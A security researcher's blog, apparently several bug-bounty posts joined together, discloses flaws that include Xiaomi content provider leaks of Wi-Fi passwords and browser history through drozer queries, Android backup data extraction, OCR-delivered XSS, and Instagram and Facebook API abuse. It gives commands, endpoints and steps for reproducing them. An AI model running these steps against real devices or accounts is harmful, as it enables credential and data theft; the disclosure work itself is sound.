Disclosing wifi password via content provider injection in Xiaomi


The saved Wi-Fi passwords in Android are stored in the data\misc\wifi directory which can only be accessed if you have root access. So in general you cannot list or access the /data directory until and unless you have root access or the files are world readable writable .

Device used:

(Xiaomi Redmi note 7 pro 9)

➜ appreview adb shell getprop | grep -E "ro.miui.region|ro.build.fingerprint"
[ro.build.fingerprint]: [xiaomi/violet/violet:9/PKQ1.181203.001/V10.3.13.0.PFHINXM:user/release-keys]
[ro.miui.region]: [IN]

Poc steps:

Connect the device and run the below drozer command it will dump the wifi passwords along with other details in cleartext

run app.provider.query content://wifi/wifi


Don’t export the content provider containing user information.
Protect it via custom permissions.

Or store it in encrypted format.


Any app within the system can query and fetch wifi credentials which is not permitted by default by the system because to access the stored password the device need to be rooted but here it is easily available using which malicious app can login into victims router and can also alter the dns settings which will disclose user browsing activites to the attacker

Disclosure Timeline

Reported on Jul 18th 2019
Triaged on Jul 18th 2019
Fix reviewed and ticket closure on Sep 11th 2019

Missing access control at play store


Google play store developer account has an invite feature which allows admin user to invite other colleagues/developers for managing the account as well as app releases. With this issue, an invited user with limited permissions was able to see the information of other apps as well, which was not permitted by the account owner.

Steps to reproduce:

1.) Login to https://play.google.com/apps/publish/ as owner A using chrome.
2.) Now from A account visit Settings > Developer account > Users & Permissions.
3.) Now send an invite to user B with read-only permissions.
4.) Click on invited link and login to B account using Firefox.
5.) Now from A account change the user B permissions and restrict its visibility to one app with read-only permissions.
6.) Now from B account hit refresh he will only be able to see one app which is permitted by user A from dashboard he cannot see the other listed apps.
7.) To bypass this check just visit this URL from B account
8.) Where 5765075562513459389 is account id which will be there by default and com.dummiesguideto.indiantrain is the package name of the app.
9.) Now user B is able to watch the information of other apps which are present in A account despite A has applied the restrictive view of apps for user B.

Video Poc

17-April-2018-Fixed and Bounty rewarded.
5-Sept-2018-Granted permission for public disclosure.

Thank you for reading 🙂

Content provider injection in Xiaomi stock browser

 Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.

Vulnerable component:

Drozer command:
run app.provider.query content://com.android.browser.searchhistory/searchhistory

Poc Image:


Fixing Timeline:

  • Reported to Xiaomi team on 2018-11-24
  • Bug reproduced by the team and fixed in the newer version.
  • Fix verified on 2018-12-27
  • CVE-2018-20523 assigned




Hi Readers,

Optical Character Recognition(OCR) is the process of electronically extracting text from images or any documents like PDF and reusing it in a variety of ways such as full-text searches, invoice processing, document verification etc. This one such use case will be harmful as obvious when those extracted texts/results are used somewhere within the application or being reflected without validation.

So we just need to prepare an image containing our XSS vector which if the parser parses and reflects the output to the users it will lead to XSS.

I will take simple jpg as an example

you can create an image like that from here.


I am using tesseract for OCR along with a simple flask server which accepts the image as input and it parses and reflects back the extracted content to the admin or another user. You can find the code here.

  1. To start hit python ocr.py
  2. Now visit local server
  3. Upload the above file
  4. Now visit /admin/ocr/files
  5. you will see the alert

Similarly, create an image with the tag or blind XSS payload to confirm a pingback to your local server.


Different parser acts differently to some character like tesseract will treat forward slash “/” as L so when you will put http:// it will become http:/l because of which it won’t work in the browser so for that I am using backslashes. like that, we have to figure out for others too.

Here I am using ngrok.io just for confirming the ping you can use burp collaborator or any other tool. So create your image with this content and upload and see if you get any hits.


If you are using OCR services not only filename but also sanitize the extracted text from the image or pdf before storing them into DB.

Once you upload an image check the response whether the contents of an image are also reflected? if yes it’s possible somewhere it is being used and if there is no check on how the output text is being reflected then it can lead to the XSS especially apps which are using OCR services.

So next time when you see any application asking for KYC or for uploading scanned documents, passport size photo, document verification you can mess around it.

Hope it helps thanks.

Finding backup vulnerabilities in android apps

Hi everyone this post is just an elaboration of the 10th point that I made it in my previous post which is being often missed by dev/hunters while looking for bugs in android apps although this issue is not new and more then a vulnerability it is a misconfiguration.

Why backup?  

Just like any other OS android system allows a user to make the backup of their app that’s cool but from our end, we are concerned about whether any sensitive information is being leaked in the backup or not and whether it has been loosely configured.

Tools Required?

  1. Adb
  2. Abe
  3. Apktool
  4. Genymotion

How to proceed : 

  1. To check whether any app allows the backup you need to first reverse the apk and find the manifest file to do so execute apktool d <app-name.apk>
  2. Check-in AndroidManifest.xml file for the attribute
    android:allowBackup=” true” if this is present and its value is set to true it means we can backup the app internal data which resides under
  3. To backup the app hit the adb backup -f <backup-name.ab>
  4. Accept the backup confirmation from the device.
  5. Now you will have the app-backup.ab file in your working directory
  6. To read this you need to convert this .ab file into a .tar format using the tool
    Android Backup Extractor
    Command : java -jar abe.jar unpack app-backup.ab
  7. Then you can extract this tar file using tar xvf app-backup.tar t
  8. To make this process short I have written a custom tool pentdroid which automates all the above android operations.pentdroid
  9. Just select the operation 6 for reversing an app, 4 (For taking backup of an app ) then finally select option 5 to convert the backup.ab into backup.tar.
  10. Once you will get .tar file extract it using  WinRAR 
  11. Once it has been extracted you will get the folder residing in /data/data directory.
  12. Try to explore the various files including assets like .db, sharedprefs.xml and search for sensitive information sometimes you will find developers secrets, pass, auth token for API’s etc
  13. Here I got one such case while reporting to one of the android programs where I was able to obtain auth token stored in one of the .db files.
  14. auth_token_exposed
  15. I have used SQLite browser to see the info of .db files.
  16. By using the obtained token we can make calls to the API endpoint to fetch more information.

Why bother about this if we can find something by just rooting the device?
With this, you don’t need a rooted device to obtain data from apps internal directory ! and well this respect the program scope too as compared to the other OWASP-M2 issues which require you to have a rooted device.

Any Patch or recommendation?

1.)Try to Implement sqlcipher which encrypts the SQLite DB check out >   http://lomza.totem-soft.com/tutorial-add-sqlcipher-to-your-android-app/

2.) Set android:allowBackup=false within the android manifest file to disallow the access.

3.)Even do not let apps to upload backups in clouds containing sensitive info in clear text.






Mobile app security : Bugs which are actually counted

This post is just all about few thoughts on VAPT and regarding security programs for mobile apps not related to Mobile OS security | Malware research |  Reverse Engineering.

Mobile app security is a  buzzword these day’s and quite tangled and contradictory in itself after the arrival of IOT it became even more important to assess your apps to prevent the attacks against these systems! but in reality, the major culprit has always been the web services running in the background  REST in peace. So the question is who we are actually pentesting is it API or mobile app and if its API then we are only doing the same burp kinds of stuff like we used to do in web then
what is actual mobile app security?

Just imagine for a while who will give his/her own iPhone 6 /Android device that too jailbroken to find something in plaintext in plist! seriously?

There are too many protection levels within the system to prevent the exploitation itself  ! and infosec guys while reporting be like.

Hi team, 
Here is an insecure local storage flaw imagine that the device has been stolen, rooted & jailbroken.
I dare you if you will say in the case of IOS.

(okay just modify it  *we have physical access to the device for a while *)

Rooting or jailbreaking a device will itself will give you higher most privilege within the device so there is no point of reporting insecure local storage which is termed M2 in owasp
unless the data is stored with world readable permission in sdcard
Most of the companies won’t give a damn if the app you have tested was on rooted/jailbroken device and the twist is entire Owasp was written with respect to the emulator which comes pre-rooted.

Below are some knockout on face regarding flaws from programs :
and half of the owasp top 10 went off.


That’s the reality of acceptance of app-based vulnerability no doubt you will get those issues in any random app from the app store but it won’t have much impact.

I would rather prefer this path sdcard/android/ instead of this data/data

So what are some accepted issues about mobile app’s ?

Ans: In general any bug which has significant impact without having many privileges on device more better if you can exploit it remotely like code execution, web-view exploits! (but I guess these web-kits issues are dead these days )

Try to pentest having least privilege on an unrooted android device.
(Now it sounds like your hands + legs are being tied up)
next thing you will ask how to proceed and possible on an unrooted device? I  will post about it! few of my poc’s

Few of the issues I worked upon and helped me regarding android which at-least counts in acceptance are :

  1. Sensitive information leaked like access_tokens in logs during debugging.
  2. Fragment injections.
  3. Arbitrary code execution but there are constraint’s in this too you need to have world readable + writable permissions to overwrite the native libraries + to execute it remotely you need MITM.
    and even after doing all
    the feeling still you got informative trust me i was here 😛
  4. Xxe lucky if app is parsing xml entities you can try those apps who parse pdf,docx etc
  5. Remote code execution via web-views (addjavascriptinterface();)
  6. Sensitive Api calls and Idor .
  7. Exported intents which are helpful in bypassing authentication or screens
  8. Exported broadcast receivers like making a phone call by passing params.
  9. Tapjacking at OAuth endpoints just like clickjacking issue in the web at OAuth buttons
  10. Backup issues like android: backup=” allow” which will help you make a backup of the app and explore the sensitive stuff on it.
  11. Exported components without custom permissions include activities, receivers
    [which also can be bypassed]
  12. I consider SSL pinning should be here but still, bug bounty programs will cry coz it can be bypassed using Cydia substrate, ssl killer or exposed framework modules.

What about IOS?

  1. Some of the above issues are also relevant to ios too.
  2. Ios too have web-views which can be exploited using file Uri:// to trigger facetime calls improper URI schemes this can allow attackers, for example, send unauthenticated tweets and bypass popup blockers
  3. Check again rest API calls
  4. Do traffic analysis

So : 
App related issues which are found on a jail-broken device doesn’t count unless you got a privilege escalation exploit on the device!

These are some of my own thoughts on mobile app sec especially related to bug acceptance and feasibility of exploitation and does not intends to hurt any one’s feelings.

Thanks for reading guys and for being here 🙂
let me know your thoughts in the comment .


Bypassing Instagram Block feature

Hello Friends it been a while i have blogged well this time i am writing about one of mine old  issue .I was checking instagram  but still so as whitehat guy i was straight into testing the privacy/security measures of it .xss,csrf,oauth issues were fixed and being hunted down by other folks 😛  so i was checking my  favourite part api end points and within few hour i found 4 flaws with the Api i.e

Pwning calls like GET,PUT ,POST,DELETE

GET /  https://api.instagram.com/v1/users/{user-id}/media/recent

GET / https://api.instagram.com/v1/media/<media_id>/comments/[comment_id]

PUT /  [insta api uses less  put call it uses post for most of the update actions  ]

POST / https://api.instagram.com/v1/media/{media-id}/likes

DELETE  / https://api.instagram.com/v1/media/{media-id}/likes

Attack –> Once any user1 block any other user2 he won’t be able to see,like,share,post,comment on the vicitm post ,seeing who liked victim post right ! as same feature is in facebook.

Scenario : 

Scenario is like someone is spamming in your  instagram  wall  posting abusive stuffs on your image and is very personal which you don’t like
you now want him to be get removed from your environment and wanted to keep your self  away from all your personal stuffs
so  you have blocked me now ? you think work is done but not
Attacker will try to know  whats going on the image but he can’t because you have blocked so he cannot interact with your resources but from api end point their is flaw he  will make those  calls with the media id  to like,dislike,see comments,who liked your post ,follows etc .

Interesting thing was posting comments was restricted ! it means api is still performing some checks on some POST calls except Post,Delete /like but not on GET CALLS .

Media_id  can be easily figured out via oembed  feature in instagram by just putting [url of resource] which allows you to create embed code for the users post.

Impact : The attacker was not able to perform any of the above action from the Ui end point but was able to exploit above blocks via api end point with his own access_token  now he can delete likes,create likes,see comments ,see who liked victim post etc in authenticated sessions which violates the block functionality isn’t it ?

Reason Behind this ? 
Application was not verifying  the access_token calls whether they are coming from original owner or from any blocked user it was simply serving them.

Initial Instagram Design Flaw :
Root Reason is initial Instagram design as it is very open it let you see everything in unauthenticated sessions whereas facebook
has given users choice that what they want to show or not to outsiders [even in unauthenticated sessions ] so here no matter what
application can only apply restriction in authenticated sessions because then only it can check whom to allow or whom to restrict
when user authenticates instagram is performing only basic checks by hiding the controls and showing the non interactive page to the blocked user .
but their is exploitation possible from api end point which breaks the basic block function isn’t it .

[+] Fact despite of their patch i was again able to bypass instagram block 😛 so their is no need of block feature then ? well let them decide now or in future hope so someone will ping them .


[13 April 2015] Reported this issue to the team
[14 April 2015] Better Poc provided with Video
[16 April 2015] Got a reply for more info
[16 April 2015] Info Provided
[21 April 2015] Changes were made asked to confirm
[21 April 2015]Again reproduced the issue
[6 May 2015] Escalated to Product team
[29 September 2015] Team is still working on fix
[10 October 2015] Closed
[10 October 2015] Reopened again .
[13 March 2016] Again escalated .
[20 April 2016 ]  Issue fixed by the team with no bounty .

Changes Made By Team After the Report :

1.)Added a console for api documentation
2.)Added sandbox approach
3.)Fixed the api and ui consistency

Now all the issues are patched from both the end point api/ui .


Deleting Facebook Event&Group cover pics

Hi Friends 🙂

Here is a small logical flaw with facebook at event and group corner.
title should be deleting facebook event&group cover pic with image id reference flaw

Facebook  use numerical id’s  to identify each objects like video,url,feed,photos,event,groups etc  .So i was checking the event corner and i got a logical flaw with image id’s i thought of developer logic while building this

Test : If any random invitee of the event post any pic on event wall and if later on that pic is being utilized by the admin of the event as a event cover pic then can we do any malicious stuffs with it ?

that’s straight ! but what could be wrong with this method ? its a right of an admin to utilize the assets of event or the object he/she belongs to !

ok lets dig deep for that i first created 2 accounts A admin of event and B normal user
Now i posted on the behalf of user B and from Admin  account i tried to use that image as event cover pic . I noticed that  fb was assigning  same image id as it was assigned to the original poster B while posting it so WHAT ?

Imagine now the original poster B is being removed by the admin A from the event and now he don’t have accessed to the assets like notes,pics of that particular event . He cannot interact with them or visit them right !

But according to graph documentation the app which have created any node only have permissions to delete it !  so the user B still have delete right’s

Now  exploitation –> on triggering  Delete Request to that image id like
Delete /736667463112529
  via graph api  the result was 200  boom now when admin will refresh the page he will find that event cover pic is now being also deleted due to direct reference to image id .

This flaw was is in both facebook events and groups I reported this to facebook under the category malicious use of functionality however it was more over logical flaw being itself a vulnerability .

but the team was immediate to acknowledge the report .

Now issue has been Fixed  both from client side as well as from api side.

Fix in place : Now  facebook will generate unique id of photos whenever anyone try to use it as cover pic instead of using same id .

Here is a Video Poc ? 

cheers !


Exploiting unexploitable/self Xss

Their are multiple end points where we can get Xss in web apps but most of time they are self 😛  which require user interaction to trigger so to make it exploitable or Poc we are left with 2 options typically :p

  1. Using Clickjacking
  2. Using CSRF

depending upon which above 2 cases are present we can create poc

So here i will discuss real example in one of the yahoo acquisition “polyvore” which i reported

Their were multiple fields vulnerable to  xss they were self but their page was vulnerable to clickjack so we can exploit by putting a relative xss vector to bypass filter into fields with the help of user by tricking him to play a game of drag and drop .

which is atleast better then standalone poc atleast will convey the team :v
I will create separate post how to do it via csrf (no such fantasy involved in that too  ) but clickjack involve little configs  so just a bookmark post if you got such situations.

So i have just written  custom  .py  script which will create a clickjack to xss poc  .On running the script it will ask you the 2 things

  1. Xss vector to bypass the filter
  2.  Custom clickjack code which you can create from here here

Q.) Why custom clickjack code ? 

Because their are specific textfields ,textarea which are vulnerable and needed to include as a part of game ! you will better undestand in the video below .

Now you can give this file to victim !

Poc in action ?

Script ?

Greetz to #kotowicz for great work in Clickjacking domain .

That’s all guys 🙂

$ logout